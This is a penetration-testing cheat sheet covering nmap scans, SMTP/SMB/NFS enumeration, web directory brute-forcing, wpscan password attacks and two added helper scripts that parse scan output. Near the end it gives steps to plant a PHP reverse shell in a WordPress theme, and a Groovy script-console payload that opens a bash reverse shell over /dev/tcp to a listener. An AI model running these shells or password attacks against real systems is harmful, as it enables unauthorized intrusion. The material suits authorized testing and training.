sudo nmap -sn <RANGE>
sudo netdiscover -r <RANGE>
sudo netdiscover -i <INTERFACE>
21: ftp
22: ssh
23: telnet
25: smtp
53: domain name system
80: http
110: pop3
111: rpcbind
135: msrpc
139: netbios-ssn
143: imap
443: https
445: microsoft-ds
993: imaps
995: pop3s
1723: pptp
3306: mysql
3389: ms-wbt-server
5900: vnc
8080: http-proxy
nmap <TARGET> -sV -sC -O -p- -vv -oA fulltcp_<TARGET>
nmap <TARGET> -sU -sV -sC -p- -vv -oA fulludp_<TARGET>
nmap <TARGET> -p 20,21,22,25,80,111,135,139,443,8080 -oA portsweep_<TARGET>
nmap <TARGET> --top-ports 25 -oA portsweep_top25_<TARGET>
nmap <TARGET> -p- --script vuln -vv -oA vulnscan_<TARGET>
-Pn: skip host discovery (use if nmap reports the host as down but you know it is up)
-sn: skip the port scan (use if you just want to sweep a range to check which hosts are up)
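The -oA scans above write three files, including a greppable .gnmap file. The following is an added example, not part of the original cheat sheet or of nmap itself: a small parser that pulls the open ports out of a .gnmap file so the result can be reviewed or compared against an expected-services inventory. The function names (sample_gnmap, open_ports, hosts_with_port) and the sample scan data are assumptions made for this example; the hosts and banners in the sample are constructed, not captured from any real scan.

```shell
#!/bin/bash
# Added example (not part of the original cheat sheet): summarise the greppable
# .gnmap file that the -oA scans above write, so open ports can be reviewed or
# diffed against an inventory without re-reading the full nmap output.

# Constructed sample of .gnmap content; the tab-separated layout (Host / Ports /
# Ignored State) follows what nmap writes, but hosts and banners are made up.
sample_gnmap() {
  printf '%s\t%s\n' 'Host: 10.0.0.5 ()' 'Status: Up'
  printf '%s\t%s\t%s\n' 'Host: 10.0.0.5 ()' \
    'Ports: 22/open/tcp//ssh//OpenSSH 8.4p1/, 80/open/tcp//http//Apache httpd 2.4.38/, 445/filtered/tcp//microsoft-ds///' \
    'Ignored State: closed (65532)'
  printf '%s\t%s\n' 'Host: 10.0.0.7 ()' 'Status: Up'
  printf '%s\t%s\t%s\n' 'Host: 10.0.0.7 ()' \
    'Ports: 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/' \
    'Ignored State: closed (65534)'
}

# open_ports FILE: print "host port proto service version" for every open port.
# Each entry in the Ports field is port/state/proto/owner/service/rpcinfo/version/.
open_ports() {
  awk -F '\t' '/^Host:/ && /\tPorts: / {
    split($1, h, " "); host = h[2]
    for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) {
      sub(/^Ports: /, "", $i)
      n = split($i, entries, ", ")
      for (j = 1; j <= n; j++) {
        split(entries[j], f, "/")
        if (f[2] == "open") printf "%s %s %s %s %s\n", host, f[1], f[3], f[5], f[7]
      }
    }
  }' "$1"
}

# hosts_with_port FILE PORT: list the hosts exposing PORT (e.g. 3389 for an RDP review)
hosts_with_port() {
  open_ports "$1" | awk -v port="$2" '$2 == port { print $1 }' | sort -u
}

# Stand-alone demo on the constructed sample: ./gnmap_summary.sh demo
if [ "${1:-}" = "demo" ]; then
  tmp=$(mktemp); sample_gnmap > "$tmp"
  open_ports "$tmp"
  rm -f "$tmp"
fi
```

Run it as `open_ports fulltcp_<TARGET>.gnmap` against a real scan file; filtered and closed ports are skipped, so the listing is exactly what a host is reachable on.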
If there is an open HTTP proxy, connect to it by configuring a proxy in your browser.
https://github.com/Tib3rius/AutoRecon
autorecon -vv <IP>
nc -nv <IP> 25
VRFY root
VRFY idontexist
Check output
https://book.hacktricks.xyz/pentesting/pentesting-smb
https://github.com/unkn-0wn/SmbVersion
sudo python3 smbver.py <IP> <PORT>
nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP>
nmap -p 139,445 --script=/usr/share/nmap/scripts/smb* <IP>
Gotta try this: https://github.com/cddmp/enum4linux-ng
enum4linux <IP>
smbclient -L <IP>
smbclient -L <IP> -U '<USER>'%'<PASS>'
smbclient //<IP>/<SHARE>
get <FILE NAME>
smbget -R smb://<IP>/<SHARE>
smbmap -H <IP> -P 445 -u ''
nbtscan <IP>
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>
- Check the file extensions in URLs to see what the application is running (.net, .aspx, .php, etc.)
- Inspect page content
- Check the Firefox debugger for outdated JavaScript libraries
- Look for /robots.txt and /sitemap.xml
curl <WEBPAGE> -o index.html
grep -o '[^/]*\.<DOMAIN>\.com' index.html | sort -u > subdomains.txt
Collect screenshots from a list of IPs
for ip in $(cat <IP FILE>); do cutycapt --url=$ip --out=$ip.png; done
Run the following bash script to view the screenshots in one HTML page
#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> web.html
echo "</BODY></HTML>" >> web.html
nikto -host <URL> -output nikto-URL.txt
dirb flags:
-r: don't search recursively (-R makes recursion interactive, prompting for each directory)
-p <IP:PORT>: set up a proxy
-X <EXTENSIONS>: append each word with these extensions
dirb <URL> /usr/share/dirb/wordlists/big.txt -o dirb-<URL>.txt
dirb <URL> /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o dirb-<URL>.txt
- Use the -b flag to blacklist status codes
- Use the -x flag to add file extensions
gobuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt -u <URL> -o gobuster-<URL>.txt
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <URL> -o gobuster-<URL>.txt
wpscan --url <URL>
wpscan --url <URL> --usernames <USERNAME> --passwords /usr/share/wordlists/rockyou.txt --max-threads 50
- Login --> Appearance --> Theme editor --> 404.php
- gedit /usr/share/webshells/php/php-reverse-shell.php
- Paste in 404.php
- Start a listener and browse to a nonexistent page
- After login go to /script
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
curl -v -X OPTIONS http://website/directory
# Check the Allow header in the response: HTTP methods such as PUT and DELETE being enabled on a directory is dangerous
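The OPTIONS check above leaves the Allow header to be read by eye. The following is an added example, not part of the original cheat sheet: it parses a saved OPTIONS response, lists the methods the server offers, and reports the two the note above flags (PUT and DELETE), so a finding can be confirmed, or a hardening change verified, from the same saved file. The function names (allowed_methods, risky_methods) and both sample responses are assumptions made for this example; the responses are constructed, not captured from any real server.

```shell
#!/bin/bash
# Added example (not part of the original cheat sheet): extract the Allow header
# from a saved OPTIONS response and report the methods the note above flags.

# Constructed sample responses (made up, not captured from any real server).
sample_permissive() {
  printf 'HTTP/1.1 200 OK\r\n'
  printf 'Allow: GET, POST, PUT, DELETE, OPTIONS\r\n'
  printf 'Content-Length: 0\r\n\r\n'
}
sample_hardened() {
  printf 'HTTP/1.1 200 OK\r\n'
  printf 'Allow: GET, HEAD, POST, OPTIONS\r\n'
  printf 'Content-Length: 0\r\n\r\n'
}

# allowed_methods FILE: print each method listed in the Allow header, one per
# line, upper-cased. Header names are case-insensitive, so match on lower-case;
# stop at the blank line that ends the header block so body text is not parsed.
allowed_methods() {
  tr -d '\r' < "$1" | awk -F ': *' '/^$/ { exit } tolower($1) == "allow" { print $2 }' \
    | tr ',' '\n' | tr -d ' ' | tr '[:lower:]' '[:upper:]' | grep -v '^$' | sort -u
}

# risky_methods FILE: the subset of allowed methods that should normally not be
# exposed on a directory (PUT and DELETE, as in the note above). Exits 0 even
# when nothing is found so it is safe under set -e.
risky_methods() {
  allowed_methods "$1" | grep -E '^(PUT|DELETE)$' || true
}

# Typical use: curl -s -i -X OPTIONS http://website/directory > resp.txt; risky_methods resp.txt
# Stand-alone demo on the constructed permissive sample: ./options_check.sh demo
if [ "${1:-}" = "demo" ]; then
  tmp=$(mktemp); sample_permissive > "$tmp"
  echo "risky methods offered:"; risky_methods "$tmp"
  rm -f "$tmp"
fi
```

Save the response with `curl -s -i -X OPTIONS <URL>` (headers included in stdout) rather than `-v`, whose header lines go to stderr with a `<` prefix. On Apache the usual fix is a `<LimitExcept GET POST HEAD>` block containing `Require all denied` for the directory, after which the hardened sample above is what the check should return.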